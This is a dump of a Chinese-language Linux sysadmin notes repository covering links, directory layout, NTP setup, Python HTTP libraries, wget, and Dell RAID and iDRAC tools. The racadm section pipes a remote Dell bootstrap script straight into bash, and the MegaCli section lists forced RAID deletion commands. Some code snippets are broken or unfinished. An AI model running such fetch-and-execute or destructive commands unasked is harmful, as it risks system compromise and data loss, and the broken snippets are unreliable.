14 | 软链接有时也被称为符号链接(Symbolic Link)。软链接文件就类似于Windows系统下的快捷方式。它实际上是一个特殊的文件。在软链接中,软链接文件实际上就是一个文本文件,这个问价中包含有软链接指向另一个文件的位置信息内容,因此,通过访问这个“快捷方式”就可以迅速定位到软链接所指向的源文件实体。
15 |
16 | mkdir /test && cd /test&& touch testfile
17 | ln testfile testfile_hard_link
18 | ln -s testfile testfile_soft_link
19 |
20 | ls -li * 可以查看到inode信息
21 |
22 | **总结:**
23 |
24 | 1、硬链接与原文件的inode节点号相同。而软连接的inode节点号不相同。
25 | 2、目录无法创建硬链接,但是可以创建软连接
26 | 3、软连接可以跨分区,硬链接不可以。
27 | 4、硬链接原文件删除,文件依然可以访问。软连接原文件删除,链接文件失效
28 |
29 |
30 |
31 |
32 | ###四、链接知识拓展:
33 |
34 | **1、软连接的生产使用案例:**
35 |
36 | 在我们编译apache软件时,编译路径带着版本号/application/apache2.2.21(为了区分版本用,因此路径也比较长),而在访问目录时又希望简介,此时就可以通过建立一个简单的软链接路径文件,来达到方便访问的目的。
37 |
38 | **2、硬链接的生产使用案例:**
39 |
40 | 硬件存储的快照功能。或者为备份文件创建多个硬链接文件,防止误删除。
41 |
42 | **3、文件系统的知识:**
43 |
44 | 文件的访问方式:filename->index(inode)
45 | index->data
46 |
47 | derectory 123 345 567 789
48 |
49 | indode table
50 |
51 | blocks
52 | 文件系统的磁盘布局 bootBlock block group0 .... block group N
53 | Blocke group0: super block、 Group Descriptrs 、Data block Bitmap、Inode Table、Data blocks
54 |
55 | "进程还占用文件,这时候断电了!"
56 | Kernel没有机会回收文件所占用的磁盘空间了
57 | 磁盘空间可能仍被标记为“已用”
58 | 文件系统可能会不一致
59 | 死文件,谁也访问不到了:已经没有文件名指向这些空间了
60 | 需要FSCK或其他机制回收空间
61 |
62 | ###五、例题:
63 | **1、Linux同过mkdir命令创建一个新目录/test/ 它的硬链接数怎么查看**
64 |
65 | ls -ld /test/ 权限后面的 数字为硬链接的数量为2.
66 |
67 | 原因:创建的目录本身为一个硬链接
68 | 新建目录下的隐藏目录(点号)为创建的新目录又是一个链接,所以为2个硬链接
69 | ls -lai 可以查看验证!
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 | **提示:**_硬链接就相当于文件的另一个入口。_
--------------------------------------------------------------------------------
/linuxji-chu/yi-3001-linux-mu-lu-jie-gou.md:
--------------------------------------------------------------------------------
1 | ###一、目录结构的特点
2 | linux 文件系统如下有两个特点:
3 | - 逻辑上,所有的目录都在最高级别的根目录 “/”下。
4 | - 所有的目录内容按照类别组织。
5 |
6 | ###二、目录结构
7 | **1、Linux目录结构:**
8 |
9 | 根目录结构
10 | 查看:
11 | ls -la /
12 | 或者
13 | tree -L 1 / # -L1 表示显示 "/ "下目录的层次,1表示一层
14 |
15 | /bin 二进制命令目录
16 | /boot 内核及启动程序所需要的文件目录
17 | /dev 设备文件目录
18 | /etc 常见系统及二进制安装包配置文件默认路径和服务启动命令目录
19 | /home 普通用户的家目录
20 | /lib 库文件存放目录
21 | /mnt 临时挂载目录
22 | /opt
23 | /proc 操作系统运行时,进程信息及内核信息存放的目录
24 | /usr 系统存放程序的目录
25 | /tmp 临时目录
26 |
27 |
28 |
29 | **2、重要子目录:**
30 |
31 |
32 | /etc/sysconfig/network-scripts/ifcfg-eth0 网卡
33 | /etc/resolv.conf DNS
34 | /etc/hosts host解析文件
35 | /etc/sysconfig/network 主机名,网卡启动配置
36 | /etc/fstab 开机挂载文件
37 | /etc/inittab init 程序配置文件
38 | /etc/exports nfs配置文件
39 | /etc/init.d 系统服务脚本存放目录
40 | /etc/profile 系统全局环境配置路径
41 |
42 | **3、/etc 下重要的目录:**
43 |
44 | /etc/issue 记录用户登录前显示的信息
45 | /etc/group 设定用户的组名与相关信息
46 | /etc/passwd 账号信息
47 | /etc/shadow 密码信息
48 | /etc/sudoers 可以sudo命令的配置文件
49 | /etc/login.defs 所有用户登录时的缺省配置
50 | /etc/modprobe.conf 内核模块额外参数设定
51 | /etc/syslog.conf 日志设置文件
52 |
53 | **4、其他目录:**
54 |
55 | /var 日志文件
56 | /var/log 各种系统日志存放地
57 | /var/log/message 系统信息默认日志文件,非常重要,按周轮训
58 | /var/log/secure 记录登入系统存储信息的文件,按周轮训。
59 | /var/log/wtmp 记录登录者信息的文件
60 | /var/spool 定时任务crontab 默认目录,按用户名命名的文件
61 | /var/spool/cron
62 | /var/spool/mail 系统用户邮件存放目录
63 | /var/spool/clientmqueue 临时邮件目录,有很多原因会导致这个目录碎文件很多
64 |
65 | **5、/proc 下的重要路径知识:**
66 |
67 | /proc 虚拟目录,是内存的映射
68 | /proc/version 内核版本
69 | /proc/sys/kernel 系统内核功能
70 | /proc/cpuinfo 关于CPU的信息
71 | /proc/meminfo 关于内存的信息
72 | /proc/devices 当前运行内核所配置的所有设备清单
73 | /proc/dma 当前正在使用的DMA通道
74 | /proc/filesystems 当前运行内核所配置的文件系统
75 | /proc/interrupts 正在使用的中断,和曾经有多少个中断
76 | /proc/ioports 当前正在使用的I/0端口
77 | /proc/loadavg 系统负载信息,uptime的结果
78 |
79 | **6、其他路径知识(了解):**
80 |
81 | /etc/DIR_COLORS 设定颜色
82 | /etc/host.conf 文件说明用户的系统如何查询节点名
83 | /etc/hosts.allow 设置允许使用inetd的机器使用
84 | /etc/hosts.deny
85 | /etc/protocols 系统支持的协议文件
86 | /etc/X11 X windows的配置文件
87 |
--------------------------------------------------------------------------------
/ntpfu-wu-qi.md:
--------------------------------------------------------------------------------
1 | \# NTP服务器搭建 \#
2 |
3 |
4 |
5 |
6 | \#\#\# 一、NTP服务器规划 \#\#\#
7 |
8 |
9 |
10 |
11 | \*\*1、同步方式:\*\*
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 | if1: 向公网同步
20 |
21 |
22 |
23 |
24 | if2: 向if1 和公网同步 优先向if1同步
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 | \*\*2、服务端使用方式:\*\*
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 | 1
41 |
42 | >
43 |
44 | 使用限制:只允许指定网段同步
45 |
46 |
47 |
48 |
49 | 2
50 |
51 | >
52 |
53 | 安全限制:只监听内网地址
54 |
55 |
56 |
57 |
58 | 3
59 |
60 | >
61 |
62 | 使用内网dns服务器 轮训策略 达到负载均衡
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | \*\*3、客户端使用方式:\*\*
71 |
72 | \`10分钟同步一次\`
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 | \#\#\# 一、NTP服务安装 \#\#\#
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 | yum -y install ntp ntpdate
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 | \#\#\# 二、配置NTP服务 \#\#\#
103 |
104 |
105 |
106 |
107 | \*\*1、备份配置文件:\*\*
108 |
109 | \`cp /etc/ntp.conf /etc/ntp.conf.bak\`
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 | \*\*2、修改配置文件:\*\*
118 |
119 | \`vim /etc/ntp.conf\`
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 | driftfile /var/lib/ntp/drift
128 |
129 |
130 |
131 |
132 | restrict default kod nomodify notrap nopeer noquery
133 |
134 |
135 |
136 |
137 | restrict -6 default kod nomodify notrap nopeer noquery
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 | \#允许10.0.0.0 网段使用ntp服务器
146 |
147 |
148 |
149 |
150 | restrict 10.0.0.0 mask 255.0.0.0 nomodify notrap
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 | restrict 127.0.0.1
159 |
160 |
161 |
162 |
163 | restrict -6 ::1
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 | \#优先向该服务器同步
172 |
173 |
174 |
175 |
176 | server 0.centos.pool.ntp.org iburst prefer
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 | server 1.centos.pool.ntp.org iburst
185 |
186 |
187 |
188 |
189 | server 2.centos.pool.ntp.org iburst
190 |
191 |
192 |
193 |
194 | server 3.centos.pool.ntp.org iburst
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 | \#监听IP
203 |
204 |
205 |
206 |
207 | server 101.251.216.185
208 |
209 |
210 |
211 |
212 | server 10.32.101.11
213 |
214 |
215 |
216 |
217 | \#当服务器与公用服务器时间失去联系,以局域网 10.32.101.11 服务器为客户端提供时间同步服务
218 |
219 |
220 |
221 |
222 | fudge
223 |
224 | 10.32.101.11
225 |
226 | startum 10
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 | includefile /etc/ntp/crypto/pw
235 |
236 |
237 |
238 |
239 | keys /etc/ntp/keys
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 | \*\*3、启动服务:\*\*
248 |
249 | \`/etc/init.d/ntpd start\`
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 | \*\*4、服务开机自启动:\*\*
258 |
259 | \`chkconfig ntpd on\`
260 |
261 |
262 |
263 |
264 | \#\#\#三、配置客户端
265 |
266 | \#\#\#
267 |
268 |
269 |
270 |
271 | \*\*1、dns 解析
272 |
273 | \*\*
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 | ntp.op.com
282 |
283 | -
284 |
285 | >
286 |
287 | 10.32.101.11
288 |
289 |
290 |
291 |
292 | ntp.op.com
293 |
294 | -
295 |
296 | >
297 |
298 | 10.32.101.12
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 | \*\*2、客户端配置时间同步\*\*
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 | \*/10 \*
321 |
322 | \* \* \* \(/usr/sbin/ntpdate -s ntp.op.com
323 |
324 | &
325 |
326 | &
327 |
328 | /sbin/hwclock -w\)
329 |
330 | >
331 |
332 | /dev/null
333 |
334 | &
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
--------------------------------------------------------------------------------
/pa-chong.md:
--------------------------------------------------------------------------------
1 | # 爬虫
2 |
3 | ### 一、爬虫的用途
4 |
5 | - 数据分析/人工智能数据集
6 | - 作为社交软件冷启动
7 | - 舆情监控
8 | - 竞争对手监控
9 |
10 | ### 二、数据抓取
11 |
12 | **1、library**
13 |
14 | - requests
15 | - urllib
16 | - pycurl
17 |
18 | **2、Tools**
19 |
20 | - curl
21 | - wget
22 | - httpie
--------------------------------------------------------------------------------
/pa-chong/requests-mo-kuai-shi-yong.md:
--------------------------------------------------------------------------------
1 | ### 一、requests安装
2 |
3 | ```
4 | pip install requests
5 | ```
6 |
7 |
8 |
9 | ### 二、requests 模块常见使用
10 |
11 | **1、发送get请求**
12 |
13 | ```python
14 | import requests
15 |
16 | r = requests.get('http://httpbin.org/get')
17 | print(r.json())
18 | ```
19 |
20 |
21 |
22 | **2、发送post请求**
23 |
24 | ```python
25 | import requests
26 |
27 | r = requests.post('http://httpbin.org/post')
28 | print(r.json())
29 |
30 | ```
31 |
32 |
33 |
34 | **3、发送url参数**
35 |
36 | ```
37 | import requests
38 |
39 | parse = {'username':'test','passwd':'123456'}
40 |
41 | r = requests.get('http://httpbin.org/get',params=parse)
42 | print(r.url)
43 | print(r.json())
44 | ```
45 |
46 |
47 |
48 | **4、指定请求头**
49 |
50 | ```python
51 | import requests
52 |
53 | headers = {'test-header':'test'}
54 |
55 | r = requests.get('http://httpbin.org/headers',headers=headers)
56 | print(r.json())
57 | ```
58 |
59 |
60 |
61 | **5、post发送数据**
62 |
63 | ```python
64 | import requests
65 |
66 | data = {
67 | 'username':'test',
68 | 'passwd':'123456'
69 | }
70 |
71 | r = requests.post('http://httpbin.org/post',data=data)
72 | print(r.json())
73 | ```
74 |
75 |
76 |
77 | **6、获取状态码、状态信息**
78 |
79 | ```python
80 | import requests
81 |
82 | r = requests.get('http://httpbin.org/get')
83 | print(r.status_code,r.reason)
84 | ```
85 |
86 |
87 |
88 | **7、设置cookie**
89 |
90 | ```python
91 | import requests
92 |
93 | cookies=dict(_id='1111',token='xxxxxxxx')
94 |
95 | r = requests.get('http://httpbin.org/cookies',cookies=cookies)
96 | print(r.json())
97 | ```
98 |
99 |
100 |
101 | **8、会话管理**
102 |
103 | ```python
104 | import requests
105 |
106 | s = requests.Session()
107 | s.get('http://httpbin.org/cookies/set/id/1111111')
108 | s.get('http://httpbin.org/cookies/set/token/xxxxxxxx')
109 |
110 | r = s.get('http://httpbin.org/cookies')
111 | print(r.json())
112 | ```
113 |
114 |
115 |
116 | **9、代理**
117 |
118 | ```python
119 | import requests
120 |
121 | proxies= {
122 | 'http':'http://172.104.80.229:8080'
123 | }
124 |
125 | #sock 代理
126 | #proxies = {
127 | # 'http': 'socks5://user:pass@host:port'
128 | #}
129 |
130 | r = requests.get('http://httpbin.org/ip',proxies=proxies)
131 | print(r.json())
132 | ```
133 |
134 |
135 |
136 | **10、basic auth**
137 |
138 | ```python
139 | import requests
140 |
141 | auth = requsts.auth.HTTPBasicAuth('test','123456')
142 |
143 | r = requests.get('http://httpbin.org/basic-auth/test/123456',auth=auth)
144 | print(r.json())
145 |
146 | ```
147 |
148 | **11、错误**
149 |
150 | ```python
151 | import requests
152 |
153 |
154 | r = requests.get('http://httpbin.org/status_code/404',timeout=5)
155 | r.raise_for_status()
156 | ```
157 |
158 |
--------------------------------------------------------------------------------
/pa-chong/urllib-mo-kuai-shi-yong.md:
--------------------------------------------------------------------------------
1 | # urllib模块使用
2 |
3 | ### 一、urllib模块介绍
4 |
5 | - `urllib.request` 打开和读取 URL
6 | - `urllib.error` 包含 `urllib.request` 抛出的异常
7 | - `urllib.parse` 用于解析 URL
8 | - `urllib.robotparser` 用于解析 `robots.txt` 文件
9 |
10 |
11 |
12 | ### 二、urllib 常见使用
13 |
14 | **1、get 请求**
15 |
16 | ```python
17 | from urllib import request
18 |
19 | r = request.urlopen("http://httpbin.org/get")
20 | print(r.read())
21 | ```
22 |
23 |
24 |
25 | **2、post请求**
26 |
27 | ```python
28 | from urllib import request
29 |
30 | #post请求
31 | headers={'Content-Type':'application/json'}
32 | req = request.Request("http://httpbin.org/post",headers=headers,method="POST")
33 | r = request.urlopen(req)
34 | print(r.read())
35 | ```
36 |
37 |
38 |
39 | **3、带参请求**
40 |
41 | ```python
42 | from urllib import request
43 | import json
44 |
45 | #带参请求
46 | r = request.urlopen("http://httpbin.org/get?a=1&b=2")
47 | print(json.loads(r.read()))
48 | ```
49 |
50 |
51 |
52 | **4、post数据**
53 |
54 | ```python
55 | from urllib import request
56 | from urllib import parse
57 | import json
58 |
59 | dict = {'username': 'test', 'passwd': '123456'}
60 | data = parse.urlencode(dict).encode('utf-8')
61 | headers = {'Content-Type': 'application/json'}
62 |
63 | req = request.Request('http://httpbin.org/post', data=data, method='POST')
64 |
65 | r = request.urlopen(req)
66 | print(json.loads(r.read()))
67 | ```
68 |
69 |
70 |
71 | **5、指定header**
72 |
73 | ```python
74 | from urllib import request
75 | import json
76 |
77 | headers = {'test-header': 'this test header'}
78 | req = request.Request('http://httpbin.org/headers',headers=headers)
79 |
80 | r = request.urlopen(req)
81 | print(json.loads(r.read()))
82 |
83 | ```
84 |
85 |
86 |
87 | **6、解析链接**
88 |
89 | ```python
90 | from urllib import request
91 | from urllib parse
92 |
93 | url = 'http://httpbin.org/get?a=1&b=2'
94 |
95 |
96 | ```
97 |
98 |
99 |
100 | **7、base auth**
101 |
102 | ```python
103 | #未完成,有错误
104 | from urllib import request
105 |
106 | auth_handler = request.HTTPBasicAuthHandler()
107 | auth_handler.add_password(realm='test',
108 | uri='http://httpbin.org/basic-auth/test/123456',
109 | user='test',
110 | passwd='123456')
111 |
112 | opener = request.build_opener(auth_handler)
113 |
114 | request.install_opener(opener)
115 | request.urlopen('http://httpbin.org/basic-auth/test/123456')
116 | ```
117 |
118 |
119 |
120 | **8、代理**
121 |
122 | ```python
123 | from urllib import request
124 |
125 | proxy_handler = request.ProxyHandler({'http': 'http://172.104.80.229:8080'})
126 | opener = request.build_opener(proxy_handler)
127 | r = opener.open('http://httpbin.org/ip')
128 | print(json.loads(r.read()))
129 | ```
130 |
131 |
132 |
133 | **9、cookie操作**
134 |
135 | ```python
136 | from urllib import request
137 |
138 | headers = {'Cookie': 'user=test;token=xxxxxxxxxxxx'}
139 |
140 | req = request.Request('http://httpbin.org/cookies', headers=headers)
141 |
142 | r = request.urlopen(req)
143 | print(json.loads(r.read()))
144 | ```
145 |
146 |
147 |
148 | **10、错误异常处理**
149 |
150 | ```python
151 |
152 | ```
153 |
154 |
--------------------------------------------------------------------------------
/pa-chong/wget-gong-ju.md:
--------------------------------------------------------------------------------
1 | # wget
2 |
3 | ### 一、wget 安装
4 |
5 | ```
6 | yum -y install wget
7 | ```
8 |
9 |
10 |
11 | ### 二、wget 使用
12 |
13 | **1、下载文件**
14 |
15 | ```
16 | #普通下载
17 | wget http://www.example.com/files.txt
18 |
19 | #下载重命名
20 | wget -O newname.txt http://www.example.com/files.txt
21 |
22 | #限速下载
23 | wget --limit-rate=10k http://www.example.com/files.txt
24 |
25 | #断点续传下载
26 | wget -c http://www.example.com/files.txt
27 |
28 | #后台下载
29 | wget -c -b http://www.example.com/files.txt
30 |
31 | #测试下载连接
32 | wget --spider http://www.example.com/files.txt
33 |
34 | #下载多个文件
35 | wget http://www.example.com/files[1-3].txt
36 | or
37 | cat > filename.txt
38 | url1
39 | url2
40 | url3
41 |
42 | wget -i filename.txt
43 | ```
44 |
45 |
46 |
47 | **2、镜像拷贝站点**
48 |
49 | ```
50 | #拷贝站点
51 | wget --mirror -p --convert-links http://www.example.com
52 |
53 | #排除指定文件类型
54 | wget --mirror --reject=png http://www.example.com
55 |
56 | #下载指定文件类型
57 | wget --mirror -A.css http://www.example.com
58 |
59 | #下载总限额 5k
60 | wget --mirror -Q5k http://www.example.com
61 |
62 | ```
63 |
64 | **3、查看响应头**
65 |
66 | ```
67 | #debug 获取响应头
68 | wget --debug http://httpbin.org/get
69 |
70 | #保存响应头
71 | wget -S http://httpbin.org/get
72 | ```
73 |
74 |
75 |
76 | **4、指定特定参数**
77 |
78 | ```
79 | #指定ua
80 | wget --header="user-agent: test-ua" http://httpbin.org/user-agent
81 | wget --user-agent=test-ua http://httpbin.org/user-agent
82 |
83 | #指定refer
84 | wget --referer=http://www.example.com http://httpbin.org/get
85 |
86 | ```
87 |
88 |
--------------------------------------------------------------------------------
/wang-luo.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/wang-luo.md
--------------------------------------------------------------------------------
/ying-jian-xin-xi-xiang-guan.md:
--------------------------------------------------------------------------------
1 | ###服务器SN信息查询:
2 |
3 | **IBM: **
4 |
5 | https://www-947.ibm.com/support/entry/myportal/wlup/system_x/system_x3250_m3?productContext=1882306922
6 | **DELL:**
7 |
8 | http://supportapj.dell.com/support/topics/topic.aspx/ap/shared/support/my_systems_info/zh/cn/details?c=cn&cs=cnbsd1&l=zh&s=bsd&~ck=anavml
9 |
10 | **HP:**
11 |
12 | https://h20566.www2.hp.com/portal/site/hpsc/public/wc/home/?ac.admitted=1310734461258.876444892.199480143
13 |
--------------------------------------------------------------------------------
/ying-jian-xin-xi-xiang-guan/4e94-dell-linux-shou-ji-xin-606f28-dell-bao-969c29.md:
--------------------------------------------------------------------------------
1 | ### 1、安装软件包
2 |
3 | 1> dell 官方下载文件 dell-dset-lx64-3.7.0.219.bin
4 |
5 | 2> 拨打dell 客服电话 让技术人员提供下载地址
6 |
7 | ### 2、 保修准备信息
8 |
9 | 1> 获取序列号:dmidecode -t system | grep "Serial Number:"
10 |
11 | 2> 获取服务器型号:dmidecode -t system | grep "Product Name:
12 |
13 | 注意: dell 客服人员会确认此信息
14 |
15 | 3>确认是否在保: http://supportapj.dell.com/support/topics/topic.aspx/ap/shared/support/my_systems_info/zh/cn/details?c=cn&cs=cnbsd1&l=zh&s=bsd&~ck=anavml
16 |
17 | ### 3、使用收集日志:
18 |
19 | ./dell-dset-lx64-3.7.0.219.bin
20 |
21 | 一直按回车,阅读完相关信息
22 |
23 | Do you agree to the above license terms? ('y' for yes | 'Enter' to exit):
24 |
25 | 输入: y
26 |
27 | Dell System E-Support Tool (DSET 3.7.0) Options:
28 |
29 |
30 | Choose an option:
31 |
32 | 1) View DSET Release Notes
33 | Show the latest DSET release notes.
34 |
35 | 2) Create a One-Time Local System DSET Report
36 | Creates a Local System DSET report.
37 | Note: This option does not permanently install DSET on the system.
38 |
39 | 3) Install/Upgrade DSET and Remote Provider (Recommended)
40 | Installs required components to generate reports for local and remote systems and also remote report collection
41 | from this system.
42 |
43 | 4) DSET
44 | Installs required components to generate report for remote systems.
45 |
46 | 5) Remote Provider
47 | Installs required components to allow reports to be generated from a remote system against this system.
48 |
49 | 6) Clear Dell Hardware Logs
50 | Clears the Dell Hardware logs (ESM logs) from the system.
51 | Note: This option does not permanently install DSET on the system.
52 |
53 | 7) Quit
54 | Exits the installation process
55 |
56 | Enter option (1-7):
57 |
58 | 输入:2 <一次性收取即可,可以实际情况安装也行>
59 |
60 | Do you want to collect info for all hardware categories [y|n]:y
61 |
62 | Do you want to collect info for all storage categories [y|n]:y
63 |
64 | Do you want to collect info for all software categories [y|n]:y
65 |
66 | Do you want to collect linux log files [y|n]:y
67 |
68 | Do you want to collect advanced log files [y|n]:y
69 |
70 | Do you want to store this report in a default name and location [y|n]:y
71 |
72 | Do you want to enable report filtering (For more information, see the User's Guide) [y|n]:y
73 |
74 | Do you want to upload the report on request to Dell Technical Support after the report is generated [y|n]:y
75 |
76 | 输入:一连串 y <根据实际情况选择,默认全y 即可>
77 |
78 |
79 |
80 | 收集完成:家目录下会有一个zip 包,down下来邮件发送给dell 客服即可
81 | 也可以自行打开查看zip包内容,密码dell
82 |
83 | 包示例:DSET-Report-for-[SvcTag-XXX<序列号>-PE-R430]-on-01-17-2019-at-10.51-AM.zip
84 |
85 |
86 | ### 4、其他方式收集
87 |
88 | idrac收集 略
89 | bios-u盘收集 略
90 |
91 |
92 |
93 |
94 |
95 |
96 |
--------------------------------------------------------------------------------
/ying-jian-xin-xi-xiang-guan/liu-3001-cha-kan-linux-ben-ji-gong-wang-ip.md:
--------------------------------------------------------------------------------
1 | - curl http://members.3322.org/dyndns/getip
2 | - curl ip.6655.com/ip.aspx
3 | - curl ifconfig.me
4 | - curl icanhazip.com
5 | - curl ident.me
6 | - curl ipecho.net/plain
7 | - curl whatismyip.akamai.com
8 | - curl myip.dnsomatic.com
9 | - wget -qO - ifconfig.co
10 |
11 | **返回IP和地区:**
12 |
13 | - curl ip.6655.com/ip.aspx?area=1
14 | - curl cip.cc
15 |
16 |
--------------------------------------------------------------------------------
/ying-jian-xin-xi-xiang-guan/san-3001-dell-megacli-ming-ling.md:
--------------------------------------------------------------------------------
1 | #常用命令
2 |
3 | ###一、raid信息 查看
4 | **RAID 1**
5 |
6 | RAID Level : Primary-1, Secondary-0, RAID Level Qualifier-0
7 | **RAID 0**
8 |
9 | RAID Level : Primary-0, Secondary-0, RAID Level Qualifier-0
10 | **RAID 5**
11 |
12 | RAID Level : Primary-5, Secondary-0, RAID Level Qualifier-3
13 |
14 | **RAID 6**
15 |
16 | RAID Level : Primary-6, Secondary-0, RAID Level Qualifier-3
17 |
18 | **RAID 10**
19 |
20 | RAID Level : Primary-1, Secondary-3, RAID Level Qualifier-0
21 |
22 | ###二、常用命令
23 | **查看硬盘当前状态:**
24 |
25 | /opt/MegaRAID/MegaCli/MegaCli64 -PDList -aAll|egrep "Adapter|Enclosure Device ID|Slot Number|Foreign State:"
26 | **清除外来设备:**
27 |
28 | /opt/MegaRAID/MegaCli/MegaCli64 -cfgforeign -clear -a0 (在线更换硬盘或者增加硬盘后需要操作)
29 | **创建raid方法:**
30 |
31 | >raid 0:
32 |
33 | /opt/MegaRAID/MegaCli/MegaCli64 -CfgLdAdd -r0 [32:5,32:6,32:7,32:8,32:9] WB Direct -a0
34 | >raid 1:
35 |
36 | /opt/MegaRAID/MegaCli/MegaCli64 -CfgLdAdd -r1 [32:4,32:5] WB Direct -a0
37 | >raid5:
38 |
39 | /opt/MegaRAID/MegaCli/MegaCli64 -CfgLdAdd -r5 [32:2,32:3,32:4,32:5,32:6,32:7] WB Direct -a0
40 | >raid 6:
41 |
42 | /opt/MegaRAID/MegaCli/MegaCli64 -CfgLdAdd -r6 [32:2,32:3,32:4,32:5] WB Direct -a0
43 | >raid 10:
44 |
45 | /opt/MegaRAID/MegaCli/MegaCli64 -CfgSpanAdd -r10 -Array0[32:2,32:3] -Array1[32:4,32:5] -Array2[32:6,32:7] WB Direct -a0
46 |
47 | >raid5 + 热备盘
48 |
49 | /opt/MegaRAID/MegaCli/MegaCli64 -CfgLdAdd -r5 [32:2,32:3,32:4] WB Direct -Hsp[32:5] -a0
50 |
51 | **删除raid:**
52 |
53 | /opt/MegaRAID/MegaCli/MegaCli64 -cfglddel -L1 -force -a0
54 | **查看所有硬盘详细信息:**
55 |
56 | /opt/MegaRAID/MegaCli/MegaCli64 -PDList -aALL
57 | **查看所有raid信息:**
58 |
59 | /opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll
60 | **查看硬盘物理状态:**
61 |
62 | /opt/MegaRAID/MegaCli/MegaCli64 -PDList -aALL |grep "Firmware state"
63 | **外部设备导入raid信息:**
64 |
65 | /opt/MegaRAID/MegaCli/MegaCli64 -cfgforeign -import -a0
66 | **修改硬盘模式为unconfigure good:**
67 |
68 | /opt/MegaRAID/MegaCli/MegaCli64 -PDMakeGood -PhysDrv[32:4] -force -a0
69 | **显示硬盘重建进度:**
70 |
71 | /opt/MegaRAID/MegaCli/MegaCli64 -PDRbld -ShowProg -PhysDrv [32:1] -a0
72 | **查看日志:**
73 |
74 | /opt/MegaRAID/MegaCli/MegaCli64 -FwTermLog dsply -a0
75 | **查看raid卡电池状态:**
76 |
77 | /opt/MegaRAID/MegaCli/MegaCli64 -adpallinfo -a0|grep -i bbu
78 | **查看raid卡的信息:**
79 |
80 | /opt/MegaRAID/MegaCli/MegaCli64 -AdpAllInfo -aALL
81 | **查看磁盘缓存策略:**
82 |
83 | /opt/MegaRAID/MegaCli/MegaCli64 -LDGetProp -Cache -LALL -aALL
84 | **设置磁盘缓存策略:**
85 |
86 | 缓存策略解释:
87 |
88 | WT (Write through
89 | WB (Write back)
90 | NORA (No read ahead)
91 | RA (Read ahead)
92 | ADRA (Adaptive read ahead)
93 | Cached
94 | Direct
95 | 例子:
96 | #/opt/MegaRAID/MegaCli/MegaCli64 -LDSetProp WT|WB|NORA|RA|ADRA -L0 -a0
97 | or
98 | #/opt/MegaRAID/MegaCli/MegaCli64 -LDSetProp -Cached|-Direct -L0 -a0
99 | or
100 | enable / disable disk cache
101 | #/opt/MegaRAID/MegaCli/MegaCli64 -LDSetProp -EnDskCache|-DisDskCache -L0 -a0
102 |
103 |
104 |
--------------------------------------------------------------------------------
/ying-jian-xin-xi-xiang-guan/si-3001-dell-racadm-ming-ling.md:
--------------------------------------------------------------------------------
1 | ###1、安装racadm
2 |
3 | wget -q -O - http://linux.dell.com/repo/hardware/latest/bootstrap.cgi | bash
4 | yum -y install srvadmin-all
5 | ###2、命令详解
6 |
7 | **获取网卡信息:**
8 |
9 | racadm get niccfg
10 | **获取 内存 风扇 cpu信息:**
11 |
12 | racadm getsensorinfo
13 | **所有联机的磁盘:**
14 |
15 | racadm raid get pdisks
16 | **raid卡信息:**
17 |
18 | racadm raid get controllers -o
19 | **列出所有网卡:**
20 |
21 | racadm nicstatistics
22 | **网卡状态:**
23 |
24 | racadm nicstatistics
--------------------------------------------------------------------------------
/ying-jian-xin-xi-xiang-guan/wu-3001-hp-hpasmcli-ming-ling.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/ying-jian-xin-xi-xiang-guan/wu-3001-hp-hpasmcli-ming-ling.md
--------------------------------------------------------------------------------
/ying-jian-xin-xi-xiang-guan/yi-3001-dell-fu-wu-qi-chang-jian-wen-ti-ji-zhu-shou-ce.md:
--------------------------------------------------------------------------------
1 | **DELL 服务器有时会若硬件的改动,在开机以后会提示错误信息。信息一般会提示在显示模块上,以下为常见问题及解决方法:**
2 |
3 |
4 |
5 | | **报错信息** | **原因** | 解决方法 |
6 | | :--- | :--- | :--- |
7 | | Alert! iDRAC6 not responding.Rebooting. | iDRAC6 未响应 BIOS 通信,一种原因是它未正常运行,另一种原因是它未完成初始化。系统将重新引导。 | 请等待系统重新引导。 |
8 | | Alert! iDRAC6 not responding.Power required may exceed PSU wattage.Alert! Continuing system boot accepts the risk that system may power down without warning. | iDRAC6 挂起。系统在引导时,iDRAC6 被远程重设。在交流电恢复之后,iDRAC6 需要比正常情况下更长的时间来引导。 | 断开系统的交流电源 10 秒,然后重新启动系统。 |
9 | | Alert! Node Interleaving disabled! Memory configuration does not support Node Interleaving. | 内存配置不支持节点交叉,或配置已更改(例如,内存模块出现故障),导致无法支持节点交叉。 系统将继续运行,但没有节点交叉功能。 | 请确保将内存模块安装在支持节点交叉的配置中。 |
10 | | Alert! Power required exceeds PSU wattage.Check PSU and system configuration.Alert! Continuing system boot accepts the risk that system may power down without warning. | 电源设备可能不支持处理器、内存模块和扩充卡的系统配置。 | 如果某些系统组件刚刚进行了升级,请将系统恢复为以前的配置。 |
11 | | Alert! Redundant memory disabled!Memory configuration does not support redundant | 虽然系统设置程序中已启用内存镜像功能,但当前配置不支持冗余内存。内存模块可能出现故障。 | 请检查内存模块是否出现故障。 |
